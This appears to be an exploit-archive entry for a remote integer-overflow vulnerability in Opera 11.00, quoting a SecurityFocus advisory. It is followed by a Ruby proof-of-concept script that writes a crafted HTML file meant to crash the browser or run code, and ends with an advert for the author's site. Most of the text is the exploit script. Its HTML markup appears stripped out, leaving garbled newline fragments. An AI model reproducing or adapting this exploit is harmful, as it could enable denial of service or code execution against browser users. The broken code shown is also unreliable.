source: https://www.securityfocus.com/bid/46003/info Opera Web Browser is prone to a remote integer-overflow vulnerability. Successful exploits will allow an attacker to run arbitrary code in the context of the user running the application. Failed attacks will cause denial-of-service conditions. Opera 11.00 is vulnerable; other versions may also be affected. print "[*]Creating the Exploit\n" i = 0 buf = "\n" while i<0x4141 buf += "\n" i+=1 end HTML = "\n"+ "
\n\n"+ "\n\n"+ "\n\n\n"+ "\n\n\n\n\n" f = File.open("Exploit_opera_11.00.html","w") f.puts HTML f.close puts "\n\n\[*]File Created With Sucess" sleep(1) puts "[*]Go to my Site www.invasao.com.br!" sleep(1)